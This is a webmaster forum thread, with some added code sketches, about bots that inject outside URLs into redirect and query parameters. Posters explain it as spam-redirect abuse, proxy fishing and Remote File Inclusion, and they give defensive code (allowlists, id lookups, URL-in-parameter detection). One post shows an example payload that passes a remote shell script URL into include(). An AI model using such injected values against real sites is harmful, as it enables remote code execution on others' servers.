Forum Moderators: phranque
On my pages there are a few harmless redirects using something like
... file.php?browsenode=1234
... file.asp?code=1234
... awredir.pl?tag=sourceid&url=http://mysite/real.page.htm
However, the redirects section of awstats is now overwhelmed with fake redirects generated by robots. Presumably they find the links above and then return with modified versions that put spurious URLs after the =
for example:
... file.php?browsenode=http://www.example.com/omch/img/itofu/viroja/
... tag=http://www.exampleZZZZ.co.kr/main/created/product/2/upu/ohoqoh/
(the ZZZZ obscures part of the URL which I hope will be acceptable to post while still demonstrating what is going on. I refuse to visit these URLs because there is no telling what mischief they hold.)
Within one minute, the server log shows numerous variations being attempted with many other weird URLs.
So what is the robot trying to do?
[edited by: phranque at 1:26 am (utc) on Feb. 7, 2008]
[edit reason] examplified [/edit]
I suspect they are trying to find:
1) redirect scripts that they can exploit for sending SPAM (SPAM recipients see YOUR domain first in the URL and assume that YOUR domain is the one SPAMMING them)
2) message boards where they can post lots of URL SPAM
The robot parses the page and, upon finding ?tag=this&url=that, preferentially substitutes its own URL into the url parameter (&url=robotsURL).
Using a text browser I found at a whois-lookup type site, I find that the domain name in each case I checked is a valid site, but the full URL ends with random-letter directory names that do not exist on that site.
The same non-existent URL, for example
... www.example.de/Webgalerie/bilder/Italy/une/yiwul/
is requested by different IPs.
So the robot's target URL makes no sense... how can it be trying to spam or post if it generates a non-existent URL? If not to spam, then why?
[edited by: phranque at 1:24 am (utc) on Feb. 7, 2008]
[edit reason] examplified [/edit]
They are fishing for web proxies. The URLs are probably formatted for well-known web proxy scripts.
If you had the script installed that they are looking for, YOUR site would then proxy the connection.
Presumably, you don't have these scripts installed, but just ones that look like them.
Not much you can do now except filter the bots, as changing the URL paths without putting in a redirect to the new ones would mess up your search-engine rankings.
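As a rough illustration of what filtering could look like, here is a minimal sketch in Python (not taken from any of the scripts discussed in this thread). It flags a query string when a parameter that should never carry a URL has a value beginning with a URL scheme. The function name is_suspicious and the URL_PARAMS set are made up for this example; "url" is exempted on the assumption that a script like awredir.pl legitimately receives a URL there.

```python
from urllib.parse import parse_qsl

# Assumption: the only parameter on this site that may legitimately hold a URL.
URL_PARAMS = {"url"}

def is_suspicious(query_string, url_params=URL_PARAMS):
    """Return True if a parameter not expected to hold a URL contains one."""
    for name, value in parse_qsl(query_string, keep_blank_values=True):
        if name in url_params:
            continue  # this parameter is allowed to carry a URL
        lowered = value.strip().lower()
        if lowered.startswith(("http://", "https://", "ftp://")):
            return True
    return False
```

A request flagged this way could be answered with a 403 or simply left out of the stats. Whether that is appropriate depends on which parameters your own pages really use.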
In the future, it's probably best to avoid using common words that might be used by scripts that bots are fishing for. You could make more meaningful and specific URLs. Or another easy way to do this would be to prepend or append some site-specific string to the URLs. (Say, your site is example.com, prepend "ex_" to them.)
That is, don't use "browsenode", "code", or "tag". Use, for example, "my_browsenode", "hoohoo_code", "blah_tag". Hopefully, though, something more meaningful.
onclick="window.location.href='/clickstat.php?id=45&ref=/category/category-name'; return false;"
and I've also seen some of these strange URLs as referers on my click stat page. Instead of having the 'ref' parameter (see above) set to '/category/category-name' (an internal page on my website), the 'ref' sometimes shows a URL like this:
http:*//www.example.de/Webgalerie/bilder/Italy/une/yiwul/
I'm glad that my redirect script collects the URLs from a database via an id number instead of allowing a direct url to be typed in.
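The id-based approach described above can be sketched roughly as follows, in Python rather than the poster's actual script. The LINKS table stands in for the database, and both it and the function name resolve_redirect are hypothetical. The point is that the visitor only ever supplies a number, so an injected URL never becomes a redirect target.

```python
import re

# Hypothetical stand-in for the database table of outbound links.
LINKS = {
    45: "http://www.example.com/partner-page",
}

def resolve_redirect(raw_id, links=LINKS):
    """Return the stored URL for a numeric id, or None if the id is invalid."""
    # Accept plain ASCII digits only; URLs, signs and empty strings are rejected.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return None
    return links.get(int(raw_id))  # unknown ids also give None
```

When the function returns None, the script would show an error page or send the visitor to a fixed internal page instead of redirecting.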
[edited by: OutdoorMan at 11:08 pm (utc) on Feb. 6, 2008]
[edited by: phranque at 1:22 am (utc) on Feb. 7, 2008]
[edit reason] examplified [/edit]
The result for the visitor is a click that simply takes them to
[externalsite...]
while the click shows up with the mymarker tag in the redirects section of the awstats report.
Thus awredir simply outputs something like the literal string "http://externalsite/pagelinked", which the visitor's browser interprets as the URL to load. If I understand correctly, it is the visitor's browser, from the visitor's IP, that loads the externalsite page, so my server is not being used as a proxy?
The robot is making a request like the top example, but putting its own URL in for the external page.
So is awredir.pl subject to abuse of any kind that would mean I need to modify the perl script to permit only the external sites I expect to use?
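One way to permit only the external sites you expect is a host allowlist checked before the redirect is issued. The sketch below is in Python, not Perl, and is not a patch for awredir.pl. The ALLOWED_HOSTS entries and the function name safe_redirect_target are assumptions for illustration. As noted earlier in the thread, an unrestricted redirect script can be abused in spam because recipients see your domain first in the link.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist: the hosts this site intentionally links out to.
ALLOWED_HOSTS = {"externalsite.example", "www.externalsite.example"}

def safe_redirect_target(url, allowed_hosts=ALLOWED_HOSTS):
    """Return url if it is http(s) and points at an allowed host, else None."""
    try:
        parts = urlsplit(url)
        host = parts.hostname  # already lowercased; None if no host is present
    except ValueError:
        return None  # malformed URL
    if parts.scheme not in ("http", "https"):
        return None
    if host is None or host not in allowed_hosts:
        return None
    return url
```

Comparing the parsed hostname exactly, rather than searching the raw string for the site name, avoids being fooled by look-alikes such as externalsite.example.evil.test.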
... file.php?browsenode=http://www.example.com/omch/img/itofu/viroja/
... tag=http://www.exampleZZZZ.co.kr/main/created/product/2/upu/ohoqoh/
So what is the robot trying to do?
It is a Remote File Inclusion (RFI) attack. They are hoping that your code accepts the parameters they provide without checking for validity.
If they succeed in passing a URL parameter into your script, then your script will include the script hosted on the remote site. It will then run as part of your own script, having the same level of filesystem access that your script has. Needless to say, they can do a lot of damage that way.
If you check a few of the remote links you see referenced in the query strings of those requests, you'll probably find that most of them are PHP scripts that either modify your site files or try to execute operating system commands.
There are many ways to protect against RFI attacks. What defense methods you can use depends on what you can "afford" to block or disable. That is, you can't block or disable methods that you use yourself. (But you *can* lock them down so only you can use them and no one else can.)
One important way is by defensive coding. If you expect an incoming value for browsenode, which can be 1, 2, or 3, you should code like this (pseudocode):
switch (browsenode)
{
    case 1: doSomething(); break;
    case 2: doSomethingElse(); break;
    case 3: doSomething3(); break;
    default: doNothing(); break;  // or do something that is known to be safe
}
That way, if an attacker attempts to inject a browsenode value you weren't anticipating, nothing bad will happen.
As an exercise, consider the following code:
include(browsenode);
What will happen if a hacker injects the following value for browsenode: http: // othersite . com/ shellscript.php
(spaces added to avoid it turning into a link).
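For contrast with include(browsenode), here is a minimal sketch of a safer pattern, written in Python for illustration. The incoming value is only used as a key into a fixed table of local file names, so nothing the visitor sends is ever treated as a path or URL. The directory, the file names and the function name resolve_include are all hypothetical.

```python
from pathlib import Path

# Hypothetical local directory and fixed table of includable files.
INCLUDE_DIR = Path("/var/www/includes")
PAGES = {"1": "books.inc", "2": "music.inc", "3": "video.inc"}

def resolve_include(raw_value, pages=PAGES, base=INCLUDE_DIR):
    """Map an expected browsenode value to a local file, or None otherwise."""
    name = pages.get(raw_value)  # anything not in the table is rejected
    if name is None:
        return None
    return base / name
```

With this lookup, the injected value from the exercise simply fails to match any key, and the caller can fall through to its safe default.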
[edited by: SteveWh at 12:08 am (utc) on Feb. 8, 2008]